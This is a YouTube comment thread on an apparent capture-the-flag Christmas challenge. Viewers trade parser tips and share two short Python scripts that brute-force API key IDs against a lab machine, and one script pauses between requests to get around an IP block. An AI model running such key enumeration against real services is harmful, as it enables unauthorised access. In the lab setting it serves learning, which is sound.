bruh that was awesome

eyy beesec nice

Enjoyed it thanks

love the concept you have used to 🔥🔥 to make us learn the concept

Very fun exercise, thanks!!! ^_^

also you can use "html.parser" instead of lxml

@@asalaa5752 good to know! Thanks.

I found the same thing. I'm also confused because they said you need python. If this is intended I'm really disappointed

the room has been updated. the questions are swapped around.

it will pick all the links with href attr

If u check the output u just jave to say something like "if the json is not of the form {'item_id': XX, 'q': 'Error. Key not valid!'} then print"

Nope, it works fine

@@cimihan4816 didn't work for me

#!usr/bin/python3 import requests import time import sys print(len(sys.argv)) if len(sys.argv) != 3: print("usage: \'python3 apikeyscanner.py [TARGET_IP] [TARGET_PORT]\"") sys.exit() target_ip = sys.argv[1] target_port = sys.argv[2] print(f"running against {target_ip}:{target_port}") for i in range(1,101,2): print(f"Checking: {i}",end=" - ") x = requests.get(f"{target_ip}:{target_port}/api/{i}") data = x.json() if "Error. Key not valid!" not in data["q"]: print(f"+++++++++ found key: {i}") print("content:",data["q"]) break elif "SANTA PROTECTION" in data["q"]: print(f"IP BLOCKED: {data['q']}") #continue if input("continue[y/N]") == "y" else break print("invalid",end=" ") time.sleep(5) +++++++++++ Edit: You might need to adjust the indentation bc of youtube.

@@code4720 Try this: import requests import json for i in range(100): if i % 2 == 1: response = requests.get('YOUR_MACHINE_IP:8000/api/' + str(i)) data = response.json() if data["q"] != "Error. Key not valid!": print(i) break

@@ihak070 i will thanks

69